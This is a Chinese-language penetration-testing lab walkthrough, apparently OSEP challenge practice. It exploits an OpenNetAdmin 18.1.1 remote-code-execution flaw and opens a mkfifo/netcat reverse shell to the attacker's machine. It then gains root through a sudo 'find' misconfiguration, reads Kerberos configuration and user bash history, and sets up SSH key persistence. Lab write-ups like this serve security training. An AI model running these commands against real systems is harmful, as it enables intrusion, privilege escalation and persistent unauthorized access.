nmap -sT -Pn -A 192.168.64.164
Starting Nmap 7.92 ( <https://nmap.org> ) at 2022-07-27 06:32 EDT
Nmap scan report for 192.168.64.164
Host is up (0.22s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 68:7a:c0:de:12:a9:07:98:1a:52:f8:45:ea:24:68:79 (RSA)
| 256 5c:b3:b9:48:73:e9:e4:01:6b:b7:9f:ee:0d:0c:ba:eb (ECDSA)
|_ 256 ee:97:de:dd:52:f5:e1:bf:28:b4:4a:6b:93:42:ce:ee (ED25519)
**80/tcp open http Apache httpd 2.4.29**
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: OpenNetAdmin :: 0wn Your Network
| http-cookie-flags:
| /:
| ONA_SESSION_ID:
|_ httponly flag not set
Service Info: Host: web05.complyedge.com; OS: Linux; CPE: cpe:/o:linux:linux_kernel
开了80端口,尝试枚举可能的路径:
gobuster dir -u [<http://192.168.64.164/>](<http://192.168.64.164/>) -w /usr/share/wordlists/dirb/common.txt -e
┌──(kali㉿kali)-[~/Documents/osep/Challenge/5]
└─$ gobuster dir -u <http://192.168.64.164/> -w /usr/share/wordlists/dirb/common.txt -e 2 ⨯
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: <http://192.168.64.164/>
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Expanded: true
[+] Timeout: 10s
===============================================================
2022/07/27 06:41:15 Starting gobuster in directory enumeration mode
===============================================================
<http://192.168.64.164/.htaccess> (Status: 403) [Size: 279]
<http://192.168.64.164/.hta> (Status: 403) [Size: 279]
<http://192.168.64.164/.htpasswd> (Status: 403) [Size: 279]
<http://192.168.64.164/config> (Status: 301) [Size: 317] [--> <http://192.168.64.164/config/>]
<http://192.168.64.164/images> (Status: 301) [Size: 317] [--> <http://192.168.64.164/images/>]
<http://192.168.64.164/include> (Status: 301) [Size: 318] [--> <http://192.168.64.164/include/>]
**<http://192.168.64.164/index.php> (Status: 200) [Size: 24924]**
<http://192.168.64.164/local> (Status: 301) [Size: 316] [--> <http://192.168.64.164/local/>]
<http://192.168.64.164/modules> (Status: 301) [Size: 318] [--> <http://192.168.64.164/modules/>]
<http://192.168.64.164/plugins> (Status: 301) [Size: 318] [--> <http://192.168.64.164/plugins/>]
<http://192.168.64.164/server-status> (Status: 403) [Size: 279]
===============================================================
2022/07/27 06:43:22 Finished
===============================================================
访问http://192.168.64.164/index.php ,得到如下所示:
在exploit-db上找到一个RCE的利用脚本:https://www.exploit-db.com/exploits/47691,谷歌发现了很多,用其中用python写的利用脚本:https://github.com/amriunix/ona-rce
┌──(kali㉿kali)-[~/…/osep/Challenge/5/ona-rce]
└─$ **python3 ona-rce.py exploit <http://192.168.64.164/index.php**> 1 ⨯
[*] OpenNetAdmin 18.1.1 - Remote Code Execution
[+] Connecting !
[+] Connected Successfully!
sh$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
sh$ **rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.49.64 80 >/tmp/f**
得到反弹shell
┌──(kali㉿kali)-[~]
└─$ nc -lvnp 80
listening on [any] 80 ...
connect to [192.168.49.64] from (UNKNOWN) [192.168.64.164] 49806
sh: 0: can't access tty; job control turned off
$ which python
/usr/bin/python
$**python -c 'import pty;pty.spawn("/bin/bash")'**
www-data@web05:/opt/ona/www$ find / -name local.txt 2>/dev/null
find / -name local.txt 2>/dev/null
www-data@web05:/opt/ona/www$ **sudo -l**
sudo -l
Matching Defaults entries for www-data on web05:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin
User www-data may run the following commands on web05:
**(root) NOPASSWD: /usr/bin/find**
提权方法:https://gtfobins.github.io/gtfobins/find/
www-data@web05:/opt/ona/www$ **sudo /usr/bin/find . -exec /bin/sh \\; -quit**
sudo /usr/bin/find . -exec /bin/sh \\; -quit
# id
id
uid=0(root) gid=0(root) groups=0(root)
# find / -name proof.txt 2>/dev/null
find / -name proof.txt 2>/dev/null
/root/proof.txt
# cat /root/proof.txt
cat /root/proof.txt
84d6b516a612290c442acc8aa20032d0
# ifconfig
ifconfig
ens160: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.64.164 netmask 255.255.255.0 broadcast 192.168.64.255
inet6 fe80::250:56ff:fe86:8172 prefixlen 64 scopeid 0x20<link>
ether 00:50:56:86:81:72 txqueuelen 1000 (Ethernet)
RX packets 7915 bytes 1039329 (1.0 MB)
RX errors 0 dropped 176 overruns 0 frame 0
TX packets 6879 bytes 3196524 (3.1 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
ens192: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet **172.16.64.164** netmask 255.255.255.0 broadcast 172.16.64.255
inet6 fe80::250:56ff:fe86:5af8 prefixlen 64 scopeid 0x20<link>
ether 00:50:56:86:5a:f8 txqueuelen 1000 (Ethernet)
RX packets 3841 bytes 358553 (358.5 KB)
RX errors 0 dropped 63 overruns 0 frame 0
TX packets 3952 bytes 372441 (372.4 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 708 bytes 56432 (56.4 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 708 bytes 56432 (56.4 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
# **python -c 'import pty;pty.spawn("/bin/bash")'**
python -c 'import pty;pty.spawn("/bin/bash")'
root@web05:/opt/ona/www#
继续查找有用信息:
# cat /etc/passwd|grep /bin/bash
cat /etc/passwd|grep /bin/bash
root:x:0:0:root:/root:/bin/bash
offsec:x:1000:1000:Offsec,,,:/home/offsec:/bin/bash
# ls
ls
config images local modules workspace_plugins
config_dnld.php include login.php plugins
dcm.php index.php logout.php winc
# pwd
pwd
/opt/ona/www
# cd /
cd /
# pwd
pwd
/
# ls
ls
bin home lib64 opt sbin tmp vmlinuz.old
boot initrd.img lost+found proc snap usr
dev initrd.img.old media root srv var
etc lib mnt run sys vmlinuz
# cd home
cd home
# ls
ls
**[email protected] offsec [email protected]**
# ls -alh
ls -alh
total 20K
drwxr-xr-x 5 root root 4.0K Jul 16 2020 .
drwxr-xr-x 23 root root 4.0K Jul 16 2020 ..
drwxr-xr-x 3 [email protected] domain [email protected] 4.0K Jul 16 2020 [email protected]
drwxr-xr-x 5 offsec offsec 4.0K Jul 16 2020 offsec
drwxr-xr-x 5 [email protected] domain [email protected] 4.0K Aug 2 2020 [email protected]
# cd [email protected]
cd [email protected]
# ls -alh
ls -alh
total 36K
drwxr-xr-x 5 [email protected] domain [email protected] 4.0K Aug 2 2020 .
drwxr-xr-x 5 root root 4.0K Jul 16 2020 ..
**-rw------- 1 [email protected] domain [email protected] 456 Jul 16 2020 .bash_history**
-rw-r--r-- 1 [email protected] domain [email protected] 220 Jul 16 2020 .bash_logout
-rw-r--r-- 1 [email protected] domain [email protected] 3.7K Jul 16 2020 .bashrc
drwx------ 2 [email protected] domain [email protected] 4.0K Jul 16 2020 .cache
drwx------ 3 [email protected] domain [email protected] 4.0K Jul 16 2020 .gnupg
-rw-r--r-- 1 [email protected] domain [email protected] 807 Jul 16 2020 .profile
drwx------ 2 [email protected] domain [email protected] 4.0K Jul 16 2020 .ssh
# cat .bash_history
cat .bash_history
exit
sudo shutdown -r
sudo reboot
exit
ls /tm
ls /tmp
sudo nano /etc/ssh/sshd_config
ls /tmp/
id pete@complyedge
ls /tmp/
kinit
exit
ls /tmp
kinit
realm list
**kinit [email protected]**
**sudo nano /etc/krb5.conf**
exit
ls /tmp
kinit
reboot
exit
ls /tmp
kinit
ping dmzdc01
realm list
kinit -V
ls /tmp
kinit -V [email protected]
kinit -V [email protected]
ls -la /tmp
klist
ls
ls -la
cd .ssh
ls
mv authorized_keys ../
ls
cd ..
ls
exit
ls /tmp
klist
exit
y
查看/etc/krb5.conf内容:
# cat /etc/krb5.conf
cat /etc/krb5.conf
[logging]
default = FILE:/var/log/krb5libs.log
kdc = FILE:/var/log/krb5kdc.log
admin_server = FILE:/var/log/kadmind.log
[libdefaults]
default_realm = COMPLYEDGE.COM
dns_lookup_realm = false
dns_lookup_kdc = false
ticket_lifetime = 24h
renew_lifetime = 7d
forwardable = true
rdns = false
[realms]
COMPLYEDGE.com = {
kdc = dmzdc01.complyedge.com
default_domain = complyedge.com
}
[domain_realm]
.complyedge.com = COMPLYEDGE.COM
complyedge.com = COMPLYEDGE.COM
[appdefaults]
pam = {
minimum_uid = 3000
}
在设置免密登录的时候,如果没有authorized_keys文件,需要将公钥放到新创建的authorized_keys中。同时,需要注意authorized_keys的所有者及组,如果设置不正确,尝试登录的时候还是会需要输入密码。(以offsec用户为例,提权之后,需要将产生的文件从root:root修改为offsec:offsec).ssh目录权限为0700,当前用户所有者和所在组、authorized_keys文件权限为0600
免密登录的时候,/etc/ssh/sshd_config文件有几个参数需要设置:是否都必须,待测试。
root@web05:/home/offsec/.ssh# echo '**PubkeyAuthentication yes**' >> /etc/ssh/sshd_config
root@web05:/home/offsec/.ssh# echo '**RSAAuthentication yes**' >> /etc/ssh/sshd_config
root@web05:/home/offsec/.ssh# echo '**AuthorizedKeysFile %h/.ssh/authorized_keys**' >> /etc/ssh/sshd_config